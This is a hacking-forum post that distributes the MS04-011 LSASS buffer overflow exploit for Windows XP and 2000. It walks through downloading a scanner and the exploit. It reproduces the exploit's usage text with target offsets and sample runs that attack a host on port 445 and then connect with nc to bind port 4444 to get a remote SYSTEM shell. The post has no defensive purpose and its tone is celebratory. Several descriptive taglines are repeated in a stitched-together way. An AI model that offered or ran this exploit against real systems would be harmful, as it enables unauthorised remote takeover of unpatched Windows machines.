1- Download Lsass Vul scanner from eEye site.

[Only registered and activated users can see links]

2- Download Lsass exploit from here .

[Only registered and activated users can see links]

3- And then ...

* Usage:
*
* expl <target> <victim IP> <bindport> [connectback IP] [options]
*
* Targets:
* 0 [0x01004600]: WinXP Professional [universal] lsass.exe
* 1 [0x7515123c]: Win2k Professional [universal] netrap.dll
* 2 [0x751c123c]: Win2k Advanced Server [SP4] netrap.dll
*
* Options:
* -t: Detect remote OS:
* Windows 5.1 - WinXP
* Windows 5.0 - Win2
* Example:
*
* C:\HOD-ms04011-lsasrv-expl 0 192.168.1.10 4444 -t
*
* MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
* --- Coded by .::[ houseofdabus ]::. ---
*
* Target: IP: 192.168.1.10: OS: WinXP Professional [universal] lsass.exe
* Connecting to 192.168.1.10:445 ... OK
* Detecting remote OS: Windows 5.0
*
*
* C:\HOD-ms04011-lsasrv-expl 1 192.168.1.10 4444
*
* MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
* --- Coded by .::[ houseofdabus ]::. ---
*
* Target: IP: 192.168.1.10: OS: Win2k Professional [universal] netrap.dll
* Connecting to 192.168.1.10:445 ... OK
* Attacking ... OK
*
* C:\nc 192.168.1.10 4444
* Microsoft Windows 2000 [Version 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:\WINNT\system32>

have fun;)

=============
=peymann39 ==

haha , you can shell to 4444 port with this Exploit , Special Thanks to Peyman ;)

Remote exploit for the Lsasrv.dll RPC buffer overflow. To make this exploit work remotely you have to use the sbaaNetapi.dll which modifies the DsRoleUpgradeDownlevelServer API. Enjoy IT!

Remote exploit for the Lsasrv.dll RPC buffer overflow. Tested against various Russian and English versions of Windows XP Professional, Windows 2000 Professional, and Windows 2000 Advanced Server. Enjoy!

well heres the nice source for the much talked of LSASS exploit. Enjoy IT!